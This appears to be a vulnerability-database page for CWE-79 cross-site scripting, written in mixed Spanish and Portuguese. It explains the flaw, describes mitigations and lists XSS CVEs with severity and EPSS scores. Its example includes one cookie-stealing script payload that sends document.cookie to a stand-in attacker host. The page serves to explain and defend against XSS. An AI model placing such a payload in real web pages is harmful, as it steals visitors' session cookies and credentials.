Fallos del tipo CWE-79

28.619 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2021-34644MEDIUMMultiplayer Games <= 3.7 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2017-16019—GitBook is a command line tool (and Node.js library) for building beautiful books using GitHub/Git and Markdown (or AsciiDoc). Stored Cross-EPSS 0.9%CVE-2022-2685LOWSourceCodester Interview Management System addQuestion.php cross site scriptingEPSS 0.9%CVE-2023-52329MEDIUMCertain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an atEPSS 0.9%CVE-2023-7312MEDIUMNagios Fusion < 4.2.0 Email Settings Stored XSS via SMTP/sendmailEPSS 0.9%CVE-2026-7569HIGHQuest NetVault Backup viewclient Cross-Site Scripting Authentication Bypass VulnerabilityEPSS 0.9%CVE-2026-9780HIGHQuest NetVault Backup addclient3 Cross-Site Scripting Authentication Bypass VulnerabilityEPSS 0.9%CVE-2023-38164HIGHMicrosoft Dynamics 365 (on-premises) Cross-site Scripting VulnerabilityEPSS 0.9%CVE-2022-1087LOWhtmly Edit Profile Module cross site scriptingEPSS 0.9%CVE-2025-4859MEDIUMD-Link DAP-2695 MAC Bypass Settings Page adv_macbypass.php cross site scriptingEPSS 0.9%CVE-2019-10957—Geutebruck IP Cameras G-Code(EEC-2xxx), G-Cam(EBC-21xx/EFD-22xx/ETHC-22xx/EWPC-22xx): All versions 1.12.0.25 and prior may allow a remote auEPSS 0.9%CVE-2020-25631—A vulnerability was found in Moodle 3.9 to 3.9.1, 3.8 to 3.8.4 and 3.7 to 3.7.7 where it was possible to include JavaScript in a book's chapEPSS 0.9%CVE-2017-15125MEDIUMA flaw was found in CloudForms before 5.9.0.22 in the self-service UI snapshot feature where the name field is not properly sanitized for HTEPSS 0.9%CVE-2020-8245—Improper Input Validation on Citrix ADC and Citrix Gateway 13.0 before 13.0-64.35, Citrix ADC and NetScaler Gateway 12.1 before 12.1-58.15, EPSS 0.9%CVE-2022-24870HIGHStored Cross-site Scripting in Combodo iTopEPSS 0.9%CVE-2023-21565HIGHAzure DevOps Server Spoofing VulnerabilityEPSS 0.9%CVE-2024-33905MEDIUMIn Telegram WebK before 2.0.0 (488), a crafted Mini Web App allows XSS via the postMessage web_app_open_link event type.EPSS 0.9%CVE-2022-36107MEDIUMStored Cross-Site Scripting via FileDumpControllerEPSS 0.9%CVE-2020-15161MEDIUMPotential XSS in PrestaShopEPSS 0.9%CVE-2021-24365—Admin Columns Free (< 4.3.2) & Pro (< 5.5.2) - Authenticated Stored Cross-Site Scripting (XSS) in Custom FieldEPSS 0.9%